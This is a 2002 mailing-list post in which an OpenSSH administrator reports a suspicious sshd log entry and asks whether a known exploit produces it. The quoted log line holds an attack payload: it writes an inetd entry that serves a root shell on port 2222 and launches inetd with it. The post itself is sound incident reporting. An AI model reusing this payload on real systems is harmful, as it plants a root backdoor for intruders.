|
Security Incidents
mailing list archives
OpenSSH Attack?
From: Ulrich Keil <ulrich () der-keiler de>
Date: Sat, 29 Jun 2002 22:01:51 +0200
I run OpenSSH 3.3p1 on linux (sparc) and found these line in my
/var/log/messages:
Jun 28 22:27:27 www sshd[21761]: Bad protocol version identification
'echo "2222 stream tcp nowait root /bin/sh sh -i">>
/tmp/h;/usr/sbin/inetd /tmp/hn/inecho "2222 strea' from 192.192.230.233
Doesn't look like the OpenSSH exploit for OpenBSD 3.1 posted by
Christophe Devine on Bugtraq
(www.der-keiler.de/Mailing-Lists/securityfocus/bugtraq/2002-06/0354.html)
to me.
Is another exploit known which produces such an output?
Ulrich Keil
--
http://www.der-keiler.de
PGP Fingerprint: 5FA4 4C01 8D92 A906 E831 CAF1 3F51 8F47 1233 9AAD
Public key available at http://www.der-keiler.de/uk/pgp-key.asc
-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GCS d- s-:- a-- C++ UL+++ P++ L+++ E--- W+++ N++ o- K- w--
O- M- V- PS PE Y+ PGP++ t+ 5 X R tv b+ DI- D++
G e h-- r++ y+
------END GEEK CODE BLOCK------
Attachment:
_bin
Description:
 By Date 
By Thread
Current thread:
- OpenSSH Attack? Ulrich Keil (Jul 01)
| 
Intro
